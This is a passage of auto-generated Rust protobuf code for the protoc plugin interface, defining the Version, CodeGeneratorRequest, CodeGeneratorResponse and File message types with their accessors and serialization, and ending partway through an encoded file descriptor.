}
fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"major",
|m: &Version| { &m.major },
|m: &mut Version| { &mut m.major },
Version::get_major,
));
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"minor",
|m: &Version| { &m.minor },
|m: &mut Version| { &mut m.minor },
Version::get_minor,
));
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"patch",
|m: &Version| { &m.patch },
|m: &mut Version| { &mut m.patch },
Version::get_patch,
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"suffix",
|m: &Version| { &m.suffix },
|m: &mut Version| { &mut m.suffix },
Version::get_suffix,
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<Version>(
"Version",
0,
fields,
)
}
}
impl crate::Message for Version {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.major = ::std::option::Option::Some(is.read_int32()?);
},
2 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.minor = ::std::option::Option::Some(is.read_int32()?);
},
3 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.patch = ::std::option::Option::Some(is.read_int32()?);
},
4 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.suffix = ::std::option::Option::Some(is.read_string()?);
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if let Some(v) = self.major {
my_size += crate::rt::value_size(1, v, crate::wire_format::WireTypeVarint);
}
if let Some(v) = self.minor {
my_size += crate::rt::value_size(2, v, crate::wire_format::WireTypeVarint);
}
if let Some(v) = self.patch {
my_size += crate::rt::value_size(3, v, crate::wire_format::WireTypeVarint);
}
if let Some(v) = self.suffix.as_ref() {
my_size += crate::rt::string_size(4, &v);
}
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
if let Some(v) = self.major {
os.write_int32(1, v)?;
}
if let Some(v) = self.minor {
os.write_int32(2, v)?;
}
if let Some(v) = self.patch {
os.write_int32(3, v)?;
}
if let Some(v) = self.suffix.as_ref() {
os.write_string(4, v)?;
}
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> Version {
Version::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(file_descriptor(), 0)
}
fn default_instance() -> &'static Version {
static instance: Version = Version {
major: ::std::option::Option::None,
minor: ::std::option::Option::None,
patch: ::std::option::Option::None,
suffix: ::std::option::Option::None,
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for Version {
fn clear(&mut self) {
self.major = ::std::option::Option::None;
self.minor = ::std::option::Option::None;
self.patch = ::std::option::Option::None;
self.suffix = ::std::option::Option::None;
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for Version {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for Version {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// An encoded CodeGeneratorRequest is written to the plugin's stdin.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct CodeGeneratorRequest {
// message fields
/// The .proto files that were explicitly listed on the command-line. The
/// code generator should generate code only for these files. Each file's
/// descriptor will be included in proto_file, below.
pub file_to_generate: ::std::vec::Vec<::std::string::String>,
/// The generator parameter passed on the command-line.
parameter: ::std::option::Option<::std::string::String>,
/// FileDescriptorProtos for all files in files_to_generate and everything
/// they import. The files will appear in topological order, so each file
/// appears before any file that imports it.
///
/// protoc guarantees that all proto_files will be written after
/// the fields above, even though this is not technically guaranteed by the
/// protobuf wire format. This theoretically could allow a plugin to stream
/// in the FileDescriptorProtos and handle them one by one rather than read
/// the entire set into memory at once. However, as of this writing, this
/// is not similarly optimized on protoc's end -- it will store all fields in
/// memory at once before sending them to the plugin.
///
/// Type names of fields and extensions in the FileDescriptorProto are always
/// fully qualified.
pub proto_file: ::std::vec::Vec<crate::descriptor::FileDescriptorProto>,
/// The version number of protocol compiler.
pub compiler_version: crate::MessageField<Version>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a CodeGeneratorRequest {
fn default() -> &'a CodeGeneratorRequest {
<CodeGeneratorRequest as crate::Message>::default_instance()
}
}
impl CodeGeneratorRequest {
pub fn new() -> CodeGeneratorRequest {
::std::default::Default::default()
}
// optional string parameter = 2;
pub fn get_parameter(&self) -> &str {
match self.parameter.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_parameter(&mut self) {
self.parameter = ::std::option::Option::None;
}
pub fn has_parameter(&self) -> bool {
self.parameter.is_some()
}
// Param is passed by value, moved
pub fn set_parameter(&mut self, v: ::std::string::String) {
self.parameter = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_parameter(&mut self) -> &mut ::std::string::String {
if self.parameter.is_none() {
self.parameter = ::std::option::Option::Some(::std::string::String::new());
}
self.parameter.as_mut().unwrap()
}
// Take field
pub fn take_parameter(&mut self) -> ::std::string::String {
self.parameter.take().unwrap_or_else(|| ::std::string::String::new())
}
fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_vec_simpler_accessor::<_, _>(
"file_to_generate",
|m: &CodeGeneratorRequest| { &m.file_to_generate },
|m: &mut CodeGeneratorRequest| { &mut m.file_to_generate },
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"parameter",
|m: &CodeGeneratorRequest| { &m.parameter },
|m: &mut CodeGeneratorRequest| { &mut m.parameter },
CodeGeneratorRequest::get_parameter,
));
fields.push(crate::reflect::rt::v2::make_vec_simpler_accessor::<_, _>(
"proto_file",
|m: &CodeGeneratorRequest| { &m.proto_file },
|m: &mut CodeGeneratorRequest| { &mut m.proto_file },
));
fields.push(crate::reflect::rt::v2::make_message_field_accessor::<_, Version>(
"compiler_version",
|m: &CodeGeneratorRequest| { &m.compiler_version },
|m: &mut CodeGeneratorRequest| { &mut m.compiler_version },
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<CodeGeneratorRequest>(
"CodeGeneratorRequest",
1,
fields,
)
}
}
impl crate::Message for CodeGeneratorRequest {
fn is_initialized(&self) -> bool {
for v in &self.proto_file {
if !v.is_initialized() {
return false;
}
};
for v in &self.compiler_version {
if !v.is_initialized() {
return false;
}
};
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
crate::rt::read_repeated_string_into(wire_type, is, &mut self.file_to_generate)?;
},
2 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.parameter = ::std::option::Option::Some(is.read_string()?);
},
15 => {
crate::rt::read_repeated_message_into_vec(wire_type, is, &mut self.proto_file)?;
},
3 => {
crate::rt::read_singular_message_into_field(wire_type, is, &mut self.compiler_version)?;
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in &self.file_to_generate {
my_size += crate::rt::string_size(1, &value);
};
if let Some(v) = self.parameter.as_ref() {
my_size += crate::rt::string_size(2, &v);
}
for value in &self.proto_file {
let len = value.compute_size();
my_size += 1 + crate::rt::compute_raw_varint32_size(len) + len;
};
if let Some(v) = self.compiler_version.as_ref() {
let len = v.compute_size();
my_size += 1 + crate::rt::compute_raw_varint32_size(len) + len;
}
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
for v in &self.file_to_generate {
os.write_string(1, &v)?;
};
if let Some(v) = self.parameter.as_ref() {
os.write_string(2, v)?;
}
for v in &self.proto_file {
crate::rt::write_message_field_with_cached_size(15, v, os)?;
};
if let Some(v) = self.compiler_version.as_ref() {
crate::rt::write_message_field_with_cached_size(3, v, os)?;
}
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> CodeGeneratorRequest {
CodeGeneratorRequest::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(file_descriptor(), 1)
}
fn default_instance() -> &'static CodeGeneratorRequest {
static instance: CodeGeneratorRequest = CodeGeneratorRequest {
file_to_generate: ::std::vec::Vec::new(),
parameter: ::std::option::Option::None,
proto_file: ::std::vec::Vec::new(),
compiler_version: crate::MessageField::none(),
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for CodeGeneratorRequest {
fn clear(&mut self) {
self.file_to_generate.clear();
self.parameter = ::std::option::Option::None;
self.proto_file.clear();
self.compiler_version.clear();
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for CodeGeneratorRequest {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for CodeGeneratorRequest {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// The plugin writes an encoded CodeGeneratorResponse to stdout.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct CodeGeneratorResponse {
// message fields
/// Error message. If non-empty, code generation failed. The plugin process
/// should exit with status code zero even if it reports an error in this way.
///
/// This should be used to indicate errors in .proto files which prevent the
/// code generator from generating correct code. Errors which indicate a
/// problem in protoc itself -- such as the input CodeGeneratorRequest being
/// unparseable -- should be reported by writing a message to stderr and
/// exiting with a non-zero status code.
error: ::std::option::Option<::std::string::String>,
/// A bitmask of supported features that the code generator supports.
/// This is a bitwise "or" of values from the Feature enum.
supported_features: ::std::option::Option<u64>,
pub file: ::std::vec::Vec<code_generator_response::File>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a CodeGeneratorResponse {
fn default() -> &'a CodeGeneratorResponse {
<CodeGeneratorResponse as crate::Message>::default_instance()
}
}
impl CodeGeneratorResponse {
pub fn new() -> CodeGeneratorResponse {
::std::default::Default::default()
}
// optional string error = 1;
pub fn get_error(&self) -> &str {
match self.error.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_error(&mut self) {
self.error = ::std::option::Option::None;
}
pub fn has_error(&self) -> bool {
self.error.is_some()
}
// Param is passed by value, moved
pub fn set_error(&mut self, v: ::std::string::String) {
self.error = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_error(&mut self) -> &mut ::std::string::String {
if self.error.is_none() {
self.error = ::std::option::Option::Some(::std::string::String::new());
}
self.error.as_mut().unwrap()
}
// Take field
pub fn take_error(&mut self) -> ::std::string::String {
self.error.take().unwrap_or_else(|| ::std::string::String::new())
}
// optional uint64 supported_features = 2;
pub fn get_supported_features(&self) -> u64 {
self.supported_features.unwrap_or(0)
}
pub fn clear_supported_features(&mut self) {
self.supported_features = ::std::option::Option::None;
}
pub fn has_supported_features(&self) -> bool {
self.supported_features.is_some()
}
// Param is passed by value, moved
pub fn set_supported_features(&mut self, v: u64) {
self.supported_features = ::std::option::Option::Some(v);
}
fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"error",
|m: &CodeGeneratorResponse| { &m.error },
|m: &mut CodeGeneratorResponse| { &mut m.error },
CodeGeneratorResponse::get_error,
));
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"supported_features",
|m: &CodeGeneratorResponse| { &m.supported_features },
|m: &mut CodeGeneratorResponse| { &mut m.supported_features },
CodeGeneratorResponse::get_supported_features,
));
fields.push(crate::reflect::rt::v2::make_vec_simpler_accessor::<_, _>(
"file",
|m: &CodeGeneratorResponse| { &m.file },
|m: &mut CodeGeneratorResponse| { &mut m.file },
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<CodeGeneratorResponse>(
"CodeGeneratorResponse",
2,
fields,
)
}
}
impl crate::Message for CodeGeneratorResponse {
fn is_initialized(&self) -> bool {
for v in &self.file {
if !v.is_initialized() {
return false;
}
};
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.error = ::std::option::Option::Some(is.read_string()?);
},
2 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.supported_features = ::std::option::Option::Some(is.read_uint64()?);
},
15 => {
crate::rt::read_repeated_message_into_vec(wire_type, is, &mut self.file)?;
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if let Some(v) = self.error.as_ref() {
my_size += crate::rt::string_size(1, &v);
}
if let Some(v) = self.supported_features {
my_size += crate::rt::value_size(2, v, crate::wire_format::WireTypeVarint);
}
for value in &self.file {
let len = value.compute_size();
my_size += 1 + crate::rt::compute_raw_varint32_size(len) + len;
};
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
if let Some(v) = self.error.as_ref() {
os.write_string(1, v)?;
}
if let Some(v) = self.supported_features {
os.write_uint64(2, v)?;
}
for v in &self.file {
crate::rt::write_message_field_with_cached_size(15, v, os)?;
};
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> CodeGeneratorResponse {
CodeGeneratorResponse::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(file_descriptor(), 2)
}
fn default_instance() -> &'static CodeGeneratorResponse {
static instance: CodeGeneratorResponse = CodeGeneratorResponse {
error: ::std::option::Option::None,
supported_features: ::std::option::Option::None,
file: ::std::vec::Vec::new(),
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for CodeGeneratorResponse {
fn clear(&mut self) {
self.error = ::std::option::Option::None;
self.supported_features = ::std::option::Option::None;
self.file.clear();
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for CodeGeneratorResponse {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for CodeGeneratorResponse {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// Nested message and enums of message `CodeGeneratorResponse`
pub mod code_generator_response {
/// Represents a single generated file.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct File {
// message fields
/// The file name, relative to the output directory. The name must not
/// contain "." or ".." components and must be relative, not be absolute (so,
/// the file cannot lie outside the output directory). "/" must be used as
/// the path separator, not "\".
///
/// If the name is omitted, the content will be appended to the previous
/// file. This allows the generator to break large files into small chunks,
/// and allows the generated text to be streamed back to protoc so that large
/// files need not reside completely in memory at one time. Note that as of
/// this writing protoc does not optimize for this -- it will read the entire
/// CodeGeneratorResponse before writing files to disk.
name: ::std::option::Option<::std::string::String>,
/// If non-empty, indicates that the named file should already exist, and the
/// content here is to be inserted into that file at a defined insertion
/// point. This feature allows a code generator to extend the output
/// produced by another code generator. The original generator may provide
/// insertion points by placing special annotations in the file that look
/// like:
/// @@protoc_insertion_point(NAME)
/// The annotation can have arbitrary text before and after it on the line,
/// which allows it to be placed in a comment. NAME should be replaced with
/// an identifier naming the point -- this is what other generators will use
/// as the insertion_point. Code inserted at this point will be placed
/// immediately above the line containing the insertion point (thus multiple
/// insertions to the same point will come out in the order they were added).
/// The double-@ is intended to make it unlikely that the generated code
/// could contain things that look like insertion points by accident.
///
/// For example, the C++ code generator places the following line in the
/// .pb.h files that it generates:
/// // @@protoc_insertion_point(namespace_scope)
/// This line appears within the scope of the file's package namespace, but
/// outside of any particular class. Another plugin can then specify the
/// insertion_point "namespace_scope" to generate additional classes or
/// other declarations that should be placed in this scope.
///
/// Note that if the line containing the insertion point begins with
/// whitespace, the same whitespace will be added to every line of the
/// inserted text. This is useful for languages like Python, where
/// indentation matters. In these languages, the insertion point comment
/// should be indented the same amount as any inserted code will need to be
/// in order to work correctly in that context.
///
/// The code generator that generates the initial file and the one which
/// inserts into it must both run as part of a single invocation of protoc.
/// Code generators are executed in the order in which they appear on the
/// command line.
///
/// If |insertion_point| is present, |name| must also be present.
insertion_point: ::std::option::Option<::std::string::String>,
/// The file contents.
content: ::std::option::Option<::std::string::String>,
/// Information describing the file content being inserted. If an insertion
/// point is used, this information will be appropriately offset and inserted
/// into the code generation metadata for the generated files.
pub generated_code_info: crate::MessageField<crate::descriptor::GeneratedCodeInfo>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a File {
fn default() -> &'a File {
<File as crate::Message>::default_instance()
}
}
impl File {
pub fn new() -> File {
::std::default::Default::default()
}
// optional string name = 1;
pub fn get_name(&self) -> &str {
match self.name.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_name(&mut self) {
self.name = ::std::option::Option::None;
}
pub fn has_name(&self) -> bool {
self.name.is_some()
}
// Param is passed by value, moved
pub fn set_name(&mut self, v: ::std::string::String) {
self.name = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_name(&mut self) -> &mut ::std::string::String {
if self.name.is_none() {
self.name = ::std::option::Option::Some(::std::string::String::new());
}
self.name.as_mut().unwrap()
}
// Take field
pub fn take_name(&mut self) -> ::std::string::String {
self.name.take().unwrap_or_else(|| ::std::string::String::new())
}
// optional string insertion_point = 2;
pub fn get_insertion_point(&self) -> &str {
match self.insertion_point.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_insertion_point(&mut self) {
self.insertion_point = ::std::option::Option::None;
}
pub fn has_insertion_point(&self) -> bool {
self.insertion_point.is_some()
}
// Param is passed by value, moved
pub fn set_insertion_point(&mut self, v: ::std::string::String) {
self.insertion_point = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_insertion_point(&mut self) -> &mut ::std::string::String {
if self.insertion_point.is_none() {
self.insertion_point = ::std::option::Option::Some(::std::string::String::new());
}
self.insertion_point.as_mut().unwrap()
}
// Take field
pub fn take_insertion_point(&mut self) -> ::std::string::String {
self.insertion_point.take().unwrap_or_else(|| ::std::string::String::new())
}
// optional string content = 15;
pub fn get_content(&self) -> &str {
match self.content.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_content(&mut self) {
self.content = ::std::option::Option::None;
}
pub fn has_content(&self) -> bool {
self.content.is_some()
}
// Param is passed by value, moved
pub fn set_content(&mut self, v: ::std::string::String) {
self.content = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_content(&mut self) -> &mut ::std::string::String {
if self.content.is_none() {
self.content = ::std::option::Option::Some(::std::string::String::new());
}
self.content.as_mut().unwrap()
}
// Take field
pub fn take_content(&mut self) -> ::std::string::String {
self.content.take().unwrap_or_else(|| ::std::string::String::new())
}
pub(in super) fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"name",
|m: &File| { &m.name },
|m: &mut File| { &mut m.name },
File::get_name,
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"insertion_point",
|m: &File| { &m.insertion_point },
|m: &mut File| { &mut m.insertion_point },
File::get_insertion_point,
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"content",
|m: &File| { &m.content },
|m: &mut File| { &mut m.content },
File::get_content,
));
fields.push(crate::reflect::rt::v2::make_message_field_accessor::<_, crate::descriptor::GeneratedCodeInfo>(
"generated_code_info",
|m: &File| { &m.generated_code_info },
|m: &mut File| { &mut m.generated_code_info },
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<File>(
"CodeGeneratorResponse.File",
3,
fields,
)
}
}
impl crate::Message for File {
fn is_initialized(&self) -> bool {
for v in &self.generated_code_info {
if !v.is_initialized() {
return false;
}
};
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.name = ::std::option::Option::Some(is.read_string()?);
},
2 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.insertion_point = ::std::option::Option::Some(is.read_string()?);
},
15 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.content = ::std::option::Option::Some(is.read_string()?);
},
16 => {
crate::rt::read_singular_message_into_field(wire_type, is, &mut self.generated_code_info)?;
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if let Some(v) = self.name.as_ref() {
my_size += crate::rt::string_size(1, &v);
}
if let Some(v) = self.insertion_point.as_ref() {
my_size += crate::rt::string_size(2, &v);
}
if let Some(v) = self.content.as_ref() {
my_size += crate::rt::string_size(15, &v);
}
if let Some(v) = self.generated_code_info.as_ref() {
let len = v.compute_size();
my_size += 2 + crate::rt::compute_raw_varint32_size(len) + len;
}
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
if let Some(v) = self.name.as_ref() {
os.write_string(1, v)?;
}
if let Some(v) = self.insertion_point.as_ref() {
os.write_string(2, v)?;
}
if let Some(v) = self.content.as_ref() {
os.write_string(15, v)?;
}
if let Some(v) = self.generated_code_info.as_ref() {
crate::rt::write_message_field_with_cached_size(16, v, os)?;
}
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> File {
File::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(super::file_descriptor(), 3)
}
fn default_instance() -> &'static File {
static instance: File = File {
name: ::std::option::Option::None,
insertion_point: ::std::option::Option::None,
content: ::std::option::Option::None,
generated_code_info: crate::MessageField::none(),
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for File {
fn clear(&mut self) {
self.name = ::std::option::Option::None;
self.insertion_point = ::std::option::Option::None;
self.content = ::std::option::Option::None;
self.generated_code_info.clear();
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for File {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for File {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// Sync with code_generator.h.
#[derive(Clone,Copy,PartialEq,Eq,Debug,Hash)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub enum Feature {
FEATURE_NONE = 0,
FEATURE_PROTO3_OPTIONAL = 1,
}
impl crate::ProtobufEnum for Feature {
fn value(&self) -> i32 {
*self as i32
}
fn from_i32(value: i32) -> ::std::option::Option<Feature> {
match value {
0 => ::std::option::Option::Some(Feature::FEATURE_NONE),
1 => ::std::option::Option::Some(Feature::FEATURE_PROTO3_OPTIONAL),
_ => ::std::option::Option::None
}
}
fn values() -> &'static [Self] {
static values: &'static [Feature] = &[
Feature::FEATURE_NONE,
Feature::FEATURE_PROTO3_OPTIONAL,
];
values
}
fn enum_descriptor_static() -> crate::reflect::EnumDescriptor {
crate::reflect::EnumDescriptor::new_generated_2(super::file_descriptor(), 0)
}
}
impl ::std::default::Default for Feature {
fn default() -> Self {
Feature::FEATURE_NONE
}
}
impl crate::reflect::ProtobufValue for Feature {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeEnum<Self>;
}
impl Feature {
pub(in super) fn generated_enum_descriptor_data() -> crate::reflect::GeneratedEnumDescriptorData {
crate::reflect::GeneratedEnumDescriptorData::new_2::<Feature>("CodeGeneratorResponse.Feature", 0)
}
}
}
static file_descriptor_proto_data: &'static [u8] = b"\
\n%google/protobuf/compiler/plugin.proto\x12\x18google.protobuf.compiler\
\x1a\x20google/protobuf/descriptor.proto\"c\n\x07Version\x12\x14\n\x05ma\
jor\x18\x01\x20\x01(\x05R\x05major\x12\x14\n\x05minor\x18\x02\x20\x01(\
\x05R\x05minor\x12\x14\n\x05patch\x18\x03\x20\x01(\x05R\x05patch\x12\x16\
\n\x06suffix\x18\x04\x20\x01(\tR\x06suffix\"\xf1\x01\n\x14CodeGeneratorR\
equest\x12(\n\x10file_to_generate\x18\x01\x20\x03(\tR\x0efileToGenerate\
\x12\x1c\n\tparameter\x18\x02\x20\x01(\tR\tparameter\x12C\n\nproto_file\
\x18\x0f\x20\x03(\x0b2$.google.protobuf.FileDescriptorProtoR\tprotoFile\
\x12L\n\x10compiler_version\x18\x03\x20\x01(\x0b2!.google.protobuf.compi\
ler.VersionR\x0fcompilerVersion\"\x94\x03\n\x15CodeGeneratorResponse\x12\
\x14\n\x05error\x18\x01\x20\x01(\tR\x05error\x12-\n\x12supported_feature\
s\x18\x02\x20\x01(\x04R\x11supportedFeatures\x12H\n\x04file\x18\x0f\x20\
\x03(\x0b24.google.protobuf.compiler.CodeGeneratorResponse.FileR\x04file\
\x1a\xb1\x01\n\x04File\x12\x12\n\x04name\x18\x01\x20\x01(\tR\x04name\x12\
'\n\x0finsertion_point\x18\x02\x20\x01(\tR\x0einsertionPoint\x12\x18\n\
\x07content\x18\x0f\x20\x01(\tR\x07content\x12R\n\x13generated_code_info\
\x18\x10\x20\x01(\x0b2\".google.protobuf.GeneratedCodeInfoR\x11generated\
